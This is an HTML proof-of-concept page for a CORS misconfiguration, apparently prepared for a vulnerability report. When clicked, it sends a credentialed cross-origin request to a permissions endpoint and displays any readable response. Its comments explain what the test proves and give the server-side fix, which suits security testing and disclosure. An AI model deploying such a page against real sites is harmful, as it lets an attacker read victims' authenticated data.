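<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CORS</title>
  <style>
    /* Replaces the deprecated <center> element and the <br> spacers. */
    .poc-header { text-align: center; }
    .poc-header p { margin-top: 3em; }
    #demo { margin-top: 1.5em; white-space: pre-wrap; word-break: break-word; }
  </style>
</head>
<body>
  <!--
    CORS misconfiguration proof of concept.

    What it shows: the page sends one credentialed cross-origin GET and tries
    to read the response body. The browser only hands the body to this script
    when the server answers with an Access-Control-Allow-Origin value equal to
    this page's origin together with Access-Control-Allow-Credentials: true.
    A readable 200 response therefore means the endpoint trusts this origin
    for authenticated reads.

    What it does not show: whether cookies were actually attached. Cookies
    marked SameSite=Lax or SameSite=Strict are not sent on a cross-site XHR,
    so compare the body with an unauthenticated response before reporting.

    Fix on the server side: answer only origins from a fixed allowlist, never
    echo the request's Origin header back, do not allow the "null" origin, and
    send "Vary: Origin" so caches keep per-origin responses apart.
  -->
  <header class="poc-header">
    <h1>CORS POC</h1>
    <p>Your Website Is Vulnerable To CORS Misconfiguration</p>
    <hr>
    <!-- The original markup called exploit() from onclick, but no such
         function was defined and the request fired on page load instead. -->
    <button type="button" id="exploit-button">Exploit</button>
  </header>
  <hr>
  <!-- Result area; role="status" announces the outcome to assistive tech. -->
  <div id="demo" role="status"></div>
  <script>
    // Endpoint under test, kept exactly as the PoC author wrote it.
    // NOTE(review): the path contains a double slash ("//identity"); confirm
    // that is intended, since servers and proxies may route it differently.
    var url = 'https://frontegg-prod.au.vuln.com//identity/resources/permissions/v1';
    var output = document.getElementById('demo');

    /**
     * Send one credentialed cross-origin GET to `url` and report whether the
     * browser allowed this page to read the response.
     * Runs only when the button is clicked, never on page load.
     */
    function exploit() {
      var xhr = new XMLHttpRequest();
      xhr.open('GET', url, true);
      xhr.withCredentials = true; // Send cookies
      xhr.onreadystatechange = function () {
        if (xhr.readyState !== XMLHttpRequest.DONE) {
          return;
        }
        if (xhr.status === 200) {
          console.log(xhr.responseText);
          // textContent, not innerHTML: the body is untrusted cross-origin
          // data and must not be parsed as markup in this page.
          output.textContent = xhr.responseText;
        } else {
          // Status 0 normally means the browser withheld the response
          // (CORS policy did not allow this origin) or the network failed.
          console.error('There was a problem with the request.');
          output.textContent =
            'There was a problem with the request. (status ' + xhr.status + ')';
        }
      };
      xhr.send();
    }

    document.getElementById('exploit-button').addEventListener('click', exploit);
  </script>
</body>
</html>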